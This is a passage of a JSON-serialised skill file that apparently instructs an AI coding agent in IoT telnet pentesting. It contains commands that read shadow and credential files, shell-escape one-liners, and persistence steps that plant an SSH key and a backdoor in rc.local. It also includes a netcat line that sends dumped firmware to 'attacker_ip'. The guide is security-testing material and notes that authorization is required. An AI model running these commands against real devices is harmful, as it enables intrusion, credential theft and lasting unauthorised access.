/etc/issue\ncat /etc/*release*\ncat /etc/*version*\n\n# Hostname and network\nhostname\ncat /etc/hostname\nifconfig -a\ncat /etc/network/interfaces\ncat /etc/resolv.conf\n\n# Mounted filesystems\nmount\ncat /proc/mounts\ndf -h\n\n# Running processes\nps aux\nps -ef\ntop -b -n 1","type":"text"}]},{"type":"paragraph","content":[{"text":"User and Permission Information:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Current user context\nid\nwhoami\ngroups\n\n# User accounts\ncat /etc/passwd\ncat /etc/shadow # If readable - major security issue!\ncat /etc/group\n\n# Sudo/privilege info\nsudo -l\ncat /etc/sudoers","type":"text"}]},{"type":"paragraph","content":[{"text":"Network Services:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Listening services\nnetstat -tulpn\nlsof -i\n\n# Firewall rules\niptables -L -n -v\ncat /etc/iptables/*","type":"text"}]},{"type":"paragraph","content":[{"text":"Interesting Files and Directories:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Configuration files\nls -la /etc/\nfind /etc/ -type f -readable\n\n# Web server configs\nls -la /etc/nginx/\nls -la /etc/apache2/\nls -la /var/www/\n\n# Credentials and keys\nfind / -name \"*.pem\" 2>/dev/null\nfind / -name \"*.key\" 2>/dev/null\nfind / -name \"*password*\" 2>/dev/null\nfind / -name \"*credential*\" 2>/dev/null\ngrep -r \"password\" /etc/ 2>/dev/null\n\n# SUID/SGID binaries (privilege escalation vectors)\nfind / -perm -4000 -type f 2>/dev/null\nfind / -perm -2000 -type f 2>/dev/null\n\n# World-writable files/directories\nfind / -perm -2 -type f 2>/dev/null\nfind / -perm -2 -type d 2>/dev/null\n\n# Development/debugging tools\nwhich gdb gcc python perl ruby tcpdump\nls /usr/bin/ /bin/ /sbin/ /usr/sbin/","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Privilege Escalation (if not root)","type":"text"}]},{"type":"paragraph","content":[{"text":"Check for common vulnerabilities:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Kernel exploits\nuname -r # Check kernel version for known exploits\n\n# Check for exploitable services\nps aux | grep root\n\n# Writable service files\nfind /etc/init.d/ -writable 2>/dev/null\n\n# Cron jobs\ncrontab -l\nls -la /etc/cron*\ncat /etc/crontab","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Persistence and Further Access","type":"text"}]},{"type":"paragraph","content":[{"text":"Establish additional access methods:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Add SSH access (if SSH is available)\nmkdir -p /root/.ssh\necho \"your_ssh_public_key\" >> /root/.ssh/authorized_keys\nchmod 600 /root/.ssh/authorized_keys\nchmod 700 /root/.ssh\n\n# Start SSH service (if not running)\n/etc/init.d/ssh start\n# or\n/etc/init.d/sshd start\n# or\n/etc/init.d/dropbear start # Common on embedded devices\n\n# Add to startup scripts\necho \"/path/to/backdoor &\" >> /etc/rc.local","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Firmware Extraction","type":"text"}]},{"type":"paragraph","content":[{"text":"Extract firmware for offline analysis:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find MTD partitions (common on embedded devices)\ncat /proc/mtd\ncat /proc/partitions\n\n# Dump flash partitions\ndd if=/dev/mtd0 of=/tmp/bootloader.bin\ndd if=/dev/mtd1 of=/tmp/kernel.bin\ndd if=/dev/mtd2 of=/tmp/rootfs.bin\n\n# Copy to external storage or network\n# If network is available:\nnc attacker_ip 4444 \u003c /tmp/rootfs.bin\n\n# If HTTP server is available:\ncd /tmp\nbusybox httpd -p 8000\n# Then download from http://device_ip:8000/rootfs.bin","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common IoT Device Scenarios","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 1: No Authentication Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Connect - drops directly to root shell\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive\n# Enumerate and exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 2: Custom Port No-Auth Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Many IoT cameras use port 2222\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 3: Password-Protected Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# If you encounter a password prompt, the helper will detect it\n# Try default credentials:\n# - root/root\n# - admin/admin\n# - root/(empty)\n# Search online for device-specific defaults","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 4: Limited Shell Escape","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# If you get a limited shell:\n# Try common escape techniques:\necho $SHELL\n/bin/sh\n/bin/bash\nvi # Then :!/bin/sh\nless /etc/passwd # Then !/bin/sh\nfind / -exec /bin/sh \\;\nawk 'BEGIN {system(\"/bin/sh\")}'","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Testing Checklist","type":"text"}]},{"type":"checkbox_list","attrs":{"id":null},"content":[{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Identify device and firmware version","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for unauthenticated access","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for default/weak credentials","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Enumerate network services and open ports","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for hardcoded credentials in files","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for command injection vulnerabilities","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check file permissions (SUID, world-writable)","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for outdated software with known CVEs","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for privilege escalation vectors","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Extract firmware for offline analysis","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Document all findings with screenshots/logs","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Best Practices","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Always log your session","type":"text","marks":[{"type":"strong"}]},{"text":": Default logfile is ","type":"text"},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document everything","type":"text","marks":[{"type":"strong"}]},{"text":": Take notes on commands, responses, and findings","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use batch scripts","type":"text","marks":[{"type":"strong"}]},{"text":": Create enumeration scripts for common tasks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Research the device","type":"text","marks":[{"type":"strong"}]},{"text":": Look up known vulnerabilities, default credentials, and common issues","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use proper authorization","type":"text","marks":[{"type":"strong"}]},{"text":": Only perform pentesting on devices you own or have explicit permission to test","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Be careful with destructive commands","type":"text","marks":[{"type":"strong"}]},{"text":": Avoid commands that could brick devices or corrupt data","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor your session","type":"text","marks":[{"type":"strong"}]},{"text":": Use ","type":"text"},{"text":"tail -f","type":"text","marks":[{"type":"code_inline"}]},{"text":" in another terminal to watch activity","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"paragraph","content":[{"text":"Problem: Connection refused","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Check if telnet service is running, verify port number, check firewall rules","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Connection timeout","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Verify network connectivity, check if device is powered on, verify IP address","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: \"Permission denied\"","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Telnet service may require authentication, try default credentials","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Commands not echoing","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Use ","type":"text"},{"text":"--raw","type":"text","marks":[{"type":"code_inline"}]},{"text":" flag to see unfiltered output","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Garbled output or wrong prompt detection","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Use ","type":"text"},{"text":"--prompt","type":"text","marks":[{"type":"code_inline"}]},{"text":" flag with custom regex pattern for your specific device","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Pre-built Enumeration Scripts","type":"text"}]},{"type":"paragraph","content":[{"text":"The skill includes pre-built enumeration scripts for common tasks:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_system.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": System information gathering","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_network.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": Network configuration enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_files.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": File system exploration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_security.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": Security-focused enumeration","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Usage:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --script .claude/skills/telnetshell/enum_system.txt","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Example Usage","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Basic connection to standard telnet port\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"uname -a\"\n\n# Connection to custom port (common for IoT cameras)\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command \"ls /\"\n\n# Interactive session with logging\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --logfile /tmp/camera_session.log \\\n --interactive\n\n# Batch enumeration\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --script enum_system.txt \\\n --json > results.json\n\n# Long-running command with custom timeout\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --timeout 10 \\\n --command \"find / -name '*.conf'\"","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Official Site","type":"text","marks":[{"type":"link","attrs":{"href":"https://busybox.net/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Command List","type":"text","marks":[{"type":"link","attrs":{"href":"https://busybox.net/downloads/BusyBox.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"IoT pentesting resources and vulnerability databases","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Device-specific documentation and datasheets","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"telnetshell","author":"@skillopedia","source":{"stars":767,"repo_name":"iothackbot","origin_url":"https://github.com/brownfinesecurity/iothackbot/blob/HEAD/skills/telnetshell/SKILL.md","repo_owner":"brownfinesecurity","body_sha256":"e494845693c84d8cd3ef1e094c05f972555ac3f2ad773b7b77246bb486d508f9","cluster_key":"cddafdfff7dd80ef55b7522606f88b9b20a810b0283f7f962600cb14296ce472","clean_bundle":{"format":"clean-skill-bundle-v1","source":"brownfinesecurity/iothackbot/skills/telnetshell/SKILL.md","attachments":[{"id":"3b486a28-7ed5-5587-976f-4410d47e723d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/3b486a28-7ed5-5587-976f-4410d47e723d/attachment.md","path":"OBSERVING_SESSIONS.md","size":7804,"sha256":"2f674ab42c7f72fa3d7d9738e7bea8f652056f2e1a15397332aa5610692d3ff5","contentType":"text/markdown; charset=utf-8"},{"id":"9e11babe-ea3e-5cb4-bafc-c6ea9d55e136","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9e11babe-ea3e-5cb4-bafc-c6ea9d55e136/attachment.txt","path":"enum_files.txt","size":693,"sha256":"2febadd10bccb793effa9620f379d69db36b5efe09e02004eb30415f3ecf8910","contentType":"text/plain; charset=utf-8"},{"id":"1b6c67ed-0543-5c72-8c2a-7b7f45cdf077","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/1b6c67ed-0543-5c72-8c2a-7b7f45cdf077/attachment.txt","path":"enum_network.txt","size":543,"sha256":"5b7d938292e5078d3a0b82f196ae1c33660d56a1ca05ed86bb8593c4d5f9d82e","contentType":"text/plain; charset=utf-8"},{"id":"7cebaedb-d096-59eb-9cd5-ab1cf13648ec","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/7cebaedb-d096-59eb-9cd5-ab1cf13648ec/attachment.txt","path":"enum_security.txt","size":1017,"sha256":"669db46eb971274248a55e216aaacb025ed886b3bf8aa82dbf53cfe88cf74558","contentType":"text/plain; charset=utf-8"},{"id":"9ac6d442-325c-5432-8de0-a645d708140d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9ac6d442-325c-5432-8de0-a645d708140d/attachment.txt","path":"enum_system.txt","size":563,"sha256":"3febbee590c6848a3a949d6c61e0a5dac7574466cd3fcbdc7aeac2b85eaafae0","contentType":"text/plain; charset=utf-8"},{"id":"d18fcc00-ea00-5eec-9f75-a3302575a6b3","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/d18fcc00-ea00-5eec-9f75-a3302575a6b3/attachment.md","path":"examples.md","size":13029,"sha256":"f3b42b25e1b8e7484a9626701cce2e7dc792414727401736e5430cf35bf80f14","contentType":"text/markdown; charset=utf-8"},{"id":"5f07d4d0-2447-5174-b396-26d829a2dec6","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/5f07d4d0-2447-5174-b396-26d829a2dec6/attachment.py","path":"telnet_helper.py","size":15874,"sha256":"d4a9819287f2de7175424f7c21d24272e859dc7246b064824c37ecbfc614d74d","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"854639de447c0f37b4740e9cee232528f83c85914e80d2fb0064ee81eb56f34e","attachment_count":7,"text_attachments":7,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":2,"skill_md_path":"skills/telnetshell/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":1},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services."}},"renderedAt":1782979323481}

IoT Telnet Shell (telnetshell) This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities. Prerequisites - Python 3 with pexpect library ( or ) - telnet client installed on the system ( on Arch) - Network access to the target device's telnet port Recommended Approach: Telnet Helper Script IMPORTANT : This skill includes a Python helper script ( ) that provides a clean, reliable interface for telnet commu…